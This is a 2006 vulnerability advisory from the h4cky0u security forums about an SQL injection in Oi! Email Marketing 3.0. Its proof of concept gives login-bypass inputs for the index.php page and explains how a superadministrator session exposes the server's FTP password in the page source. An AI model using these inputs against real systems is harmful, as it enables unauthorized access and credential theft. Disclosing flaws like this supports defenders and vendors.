------------------------------------------------------
HYSA-2006-003 h4cky0u.org Advisory 012
------------------------------------------------------
Date - Thu Feb 24 2006
TITLE:
======
Oi! Email Marketing 3.0 SQL Injection
SEVERITY:
=========
High
SOFTWARE:
=========
Oi! Email Marketing 3.0. Prior versions maybe affected
INFO:
=====
Oi Email Marketing System is a Linux compatible application that can be a stand-alone product or can be integrated into Mambo 2002 content management system. It uses a powerful database which resides on your webserver and allows complete control over all your subscribers, campaigns and emails.
Support Website : www.miro.com.au
DESCRIPTION:
============
Oi Email Marketing System is prone to an SQL injection vulnerability. This issue is due to a failure in the index.php script of the application to properly sanitize user-supplied input before using it in SQL queries.
Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation.
POC:
====
First go to http://www.site.com/oi/index.php
In this login page provide the following inputs:
Username : username' OR '
Password : ' OR '
Note : here username should be a valid user registered on the site (generally admin)
Also, if a 'superadministrator'login is found and sucessfully exploited the server's
ftp password can be found by clicking 'Configuration' and viewing the pages source:
(It's hidden by *)
<TD CLASS="dialogue_heading">Password</TD>
<TD><input type="password" name="ftpPassword" value="password"></TD>
VENDOR STATUS
=============
Vendor was contacted repeatedly but no response received till date.
FIX:
====
No fix available as of date.
CREDITS:
========
- This vulnerability was discovered and researched by -
Illuminatus of h4cky0u Security Forums.
Mail : illuminatus85 at gmail dot com
Web : http://www.h4cky0u.org
- Co Researcher -
h4cky0u of h4cky0u Security Forums.
Mail : h4cky0u at gmail dot com
Web : http://www.h4cky0u.org
ORIGINAL ADVISORY:
==================
http://www.h4cky0u.org/advisories/HYSA-2006-003-oi-email.txt
--
http://www.h4cky0u.org
(In)Security at its best...